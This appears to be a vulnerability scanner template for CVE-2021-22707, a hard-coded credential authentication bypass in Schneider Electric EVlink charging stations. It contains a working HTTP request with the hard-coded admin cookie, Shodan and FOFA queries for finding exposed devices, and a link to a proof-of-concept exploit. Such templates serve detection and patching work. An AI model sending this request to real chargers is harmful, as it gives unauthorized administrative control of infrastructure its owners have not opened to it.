id: CVE-2021-22707 info: name: EVlink City < R8 V3.4.0.1 - Authentication Bypass author: ritikchaddha,dorkerdevil severity: critical description: | A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges. remediation: | Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability. reference: - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh - https://nvd.nist.gov/vuln/detail/CVE-2021-22707 - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22707 cwe-id: CWE-798 epss-score: 0.29966 epss-percentile: 0.96514 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: schneider-electric product: evlink_city_evc1s22p4_firmware shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" tags: cve2021,cve,evlink,auth-bypass,schneider-electric http: - raw: - | GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word words: - '?worker=Cluster" name="cluster" id="id_cluster' - type: status status: - 200 # digest: 4a0a0047304502210080bf5b738f5e3d2bd7a705e652a89d20b5f9eb258102735da6e453e58c98d8f002203ad7329fa1828b539ab7bbddb6bec76259924dbd032b9370b5e387b00b90bf72:922c64590222798bb761d5b6d8e72950